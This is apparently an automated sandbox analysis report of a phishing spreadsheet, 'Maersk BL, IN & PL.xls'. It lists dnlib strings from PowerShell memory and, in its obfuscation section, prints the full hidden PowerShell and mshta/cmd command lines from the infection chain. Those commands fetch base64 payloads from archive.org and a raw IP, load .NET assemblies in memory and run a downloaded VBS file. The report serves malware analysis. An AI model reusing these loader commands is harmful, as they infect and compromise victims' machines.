                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 0000000E.00000002.538241032.000007FE89A58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.539125948.000007FE89C10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.553778518.000007FE89C30000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000E.00000002.532323354.000000001C640000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.497783599.00000000123ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: 6E530000.0.drInitial sample: OLE indicators vbamacros = False
                    Source: Maersk BL, IN & PL.xlsInitial sample: OLE indicators encrypted = True

                    Data Obfuscation

                    barindex
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([stRinG]$VerBOSEprEFEReNCE)[1,3]+'X'-jOin'') ((('{0}imageUrl '+'= {1}https://i'+'a600102.us.archive.org/32/items/detah-not'+'e-v_202410/DetahNote_V.jpg {1};{0}webClient = New-Object Syste'+'m.Net.WebClient;{0}imageB'+'y'+'tes = {0}webClient.DownloadData({0}imag'+'eUrl);{0}imageText = [System.Text.Encoding]::UTF8.GetString('+'{0}imageBytes);{0}startFlag = {1}<<BASE64_START'+'>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = '+'{0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endF'+'lag);{0}startI'+'ndex -ge 0 -and {0}endIndex -'+'gt {0}startIn'+'dex;{0}startIndex += {0}sta'+'rtFlag.Length;{0}base64Length'+' = {0'+'}endIndex -'+' {0}startIn'+'dex;{0}base64Command = {0}im'+'ageText.Substring({0}startIndex, {0}base64Length);{0}commandBytes = [System.Convert]::FromBase64Stri'+'ng({0}base64Command);{0'+'}loadedAssembly = [System.R'+'eflection.Assemb'+'ly]::Load({'+'0}commandBytes);{0}vaiMethod = [dnlib.IO.Home].GetMethod({'+'1}VAI{1});{0}vai'+'Method.Invoke({0}null, @({1}txt.DRRSRR/095/9.44.042.83//:ptth{1}, {1}desativado{1}, {1}desativado{'+'1}, {1}desativado{1}, {1}RegAsm{1}, {1}desativado{1}, {1}d'+'esativado'+'{1}));') -F [CHAr]36,[CHAr]39) )"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([stRinG]$VerBOSEprEFEReNCE)[1,3]+'X'-jOin'') ((('{0}imageUrl '+'= {1}https://i'+'a600102.us.archive.org/32/items/detah-not'+'e-v_202410/DetahNote_V.jpg {1};{0}webClient = New-Object Syste'+'m.Net.WebClient;{0}imageB'+'y'+'tes = {0}webClient.DownloadData({0}imag'+'eUrl);{0}imageText = [System.Text.Encoding]::UTF8.GetString('+'{0}imageBytes);{0}startFlag = {1}<<BASE64_START'+'>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = '+'{0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endF'+'lag);{0}startI'+'ndex -ge 0 -and {0}endIndex -'+'gt {0}startIn'+'dex;{0}startIndex += {0}sta'+'rtFlag.Length;{0}base64Length'+' = {0'+'}endIndex -'+' {0}startIn'+'dex;{0}base64Command = {0}im'+'ageText.Substring({0}startIndex, {0}base64Length);{0}commandBytes = [System.Convert]::FromBase64Stri'+'ng({0}base64Command);{0'+'}loadedAssembly = [System.R'+'eflection.Assemb'+'ly]::Load({'+'0}commandBytes);{0}vaiMethod = [dnlib.IO.Home].GetMethod({'+'1}VAI{1});{0}vai'+'Method.Invoke({0}null, @({1}txt.DRRSRR/095/9.44.042.83//:ptth{1}, {1}desativado{1}, {1}desativado{'+'1}, {1}desativado{1}, {1}RegAsm{1}, {1}desativado{1}, {1}d'+'esativado'+'{1}));') -F [CHAr]36,[CHAr]39) )"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([stRinG]$VerBOSEprEFEReNCE)[1,3]+'X'-jOin'') ((('{0}imageUrl '+'= {1}https://i'+'a600102.us.archive.org/32/items/detah-not'+'e-v_202410/DetahNote_V.jpg {1};{0}webClient = New-Object Syste'+'m.Net.WebClient;{0}imageB'+'y'+'tes = {0}webClient.DownloadData({0}imag'+'eUrl);{0}imageText = [System.Text.Encoding]::UTF8.GetString('+'{0}imageBytes);{0}startFlag = {1}<<BASE64_START'+'>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = '+'{0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endF'+'lag);{0}startI'+'ndex -ge 0 -and {0}endIndex -'+'gt {0}startIn'+'dex;{0}startIndex += {0}sta'+'rtFlag.Length;{0}base64Length'+' = {0'+'}endIndex -'+' {0}startIn'+'dex;{0}base64Command = {0}im'+'ageText.Substring({0}startIndex, {0}base64Length);{0}commandBytes = [System.Convert]::FromBase64Stri'+'ng({0}base64Command);{0'+'}loadedAssembly = [System.R'+'eflection.Assemb'+'ly]::Load({'+'0}commandBytes);{0}vaiMethod = [dnlib.IO.Home].GetMethod({'+'1}VAI{1});{0}vai'+'Method.Invoke({0}null, @({1}txt.DRRSRR/095/9.44.042.83//:ptth{1}, {1}desativado{1}, {1}desativado{'+'1}, {1}desativado{1}, {1}RegAsm{1}, {1}desativado{1}, {1}d'+'esativado'+'{1}));') -F [CHAr]36,[CHAr]39) )"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([stRinG]$VerBOSEprEFEReNCE)[1,3]+'X'-jOin'') ((('{0}imageUrl '+'= {1}https://i'+'a600102.us.archive.org/32/items/detah-not'+'e-v_202410/DetahNote_V.jpg {1};{0}webClient = New-Object Syste'+'m.Net.WebClient;{0}imageB'+'y'+'tes = {0}webClient.DownloadData({0}imag'+'eUrl);{0}imageText = [System.Text.Encoding]::UTF8.GetString('+'{0}imageBytes);{0}startFlag = {1}<<BASE64_START'+'>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = '+'{0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endF'+'lag);{0}startI'+'ndex -ge 0 -and {0}endIndex -'+'gt {0}startIn'+'dex;{0}startIndex += {0}sta'+'rtFlag.Length;{0}base64Length'+' = {0'+'}endIndex -'+' {0}startIn'+'dex;{0}base64Command = {0}im'+'ageText.Substring({0}startIndex, {0}base64Length);{0}commandBytes = [System.Convert]::FromBase64Stri'+'ng({0}base64Command);{0'+'}loadedAssembly = [System.R'+'eflection.Assemb'+'ly]::Load({'+'0}commandBytes);{0}vaiMethod = [dnlib.IO.Home].GetMethod({'+'1}VAI{1});{0}vai'+'Method.Invoke({0}null, @({1}txt.DRRSRR/095/9.44.042.83//:ptth{1}, {1}desativado{1}, {1}desativado{'+'1}, {1}desativado{1}, {1}RegAsm{1}, {1}desativado{1}, {1}d'+'esativado'+'{1}));') -F [CHAr]36,[CHAr]39) )"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMzguMjQwLjQ0LjkvNTkwL25pY2VmZWF0dXJlc3dvcmtpbmdncmVhdC5UaWYiLCIkZU52OkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyIsMCwwKTtzVEFyVC1TTGVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyI='+[Char]0x22+'))')))"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMzguMjQwLjQ0LjkvNTkwL25pY2VmZWF0dXJlc3dvcmtpbmdncmVhdC5UaWYiLCIkZU52OkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyIsMCwwKTtzVEFyVC1TTGVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyI='+[Char]0x22+'))')))"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMzguMjQwLjQ0LjkvNTkwL25pY2VmZWF0dXJlc3dvcmtpbmdncmVhdC5UaWYiLCIkZU52OkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyIsMCwwKTtzVEFyVC1TTGVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyI='+[Char]0x22+'))')))"
